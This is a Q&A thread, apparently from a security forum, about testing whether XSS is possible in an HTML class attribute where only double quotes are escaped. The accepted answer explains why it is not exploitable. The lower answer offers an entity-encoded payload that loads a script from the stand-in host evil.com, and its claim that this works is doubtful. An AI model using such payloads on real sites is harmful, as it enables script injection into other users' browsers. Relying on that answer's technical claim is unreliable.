# XSS in HTML class tag with only double quotes escaped

Tags: xss, attacks, javascript

I am currently testing XSS filter and I wonder, whether it is possible to demonstrate XSS attack on class tag attribute in HTML, when only double quotes are escaped. Other characters (<, >, ') are unescaped.

Code I am testing it on looks like this:

```
<span class="MY_VALUE">
Test
</span>
```

I was not able to find any example of how to inject script in this tag.
Thanks for any help.

Comment: What is the reason for only escaping one character and not adhering to the [OWASP Recommendation](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md)?

Comment: I know all dangerous characters should be escaped, but I am only testing the website and am not the one who wrote the code. I am trying to find example why escaping only one character might be unsafe.

Answer (score 1, accepted):

Assuming the filter is working as intended, this is not vulnerable to XSS.

You need `"` to exit a double-quoted attribute value context (see also the [HTML standard](https://www.w3.org/TR/html5/syntax.html#elements-attributes) and how to [parse HTML documents](https://www.w3.org/TR/2011/WD-html5-20110113/parsing.html#the-input-stream)).

This leaves two options:

- an error in the handling of `"`: If the encoding of `"` isn't the last step before outputting, but the input is instead transformed afterwards (eg URL-decoded), then you may be able to bypass the `"` encoding (unlikely).
- if the input is handled insecurely afterwards (eg read out of the DOM and reinserted insecurely), then there would be a vulnerability. But this would be an issue of the code handling that, not of the insertion here (only encoding `"` isn't great because it leaves you with uneven data - some encoded, some not - but it's not a vulnerability).

But as-is, there is no vulnerability here.

Answer (score 2):

[Did you try](https://www.w3.org/TR/REC-html40/charset.html) MY_VALUE=

```
&#34>(delivered)<script src=&#34http://evil.com/code.js
```

?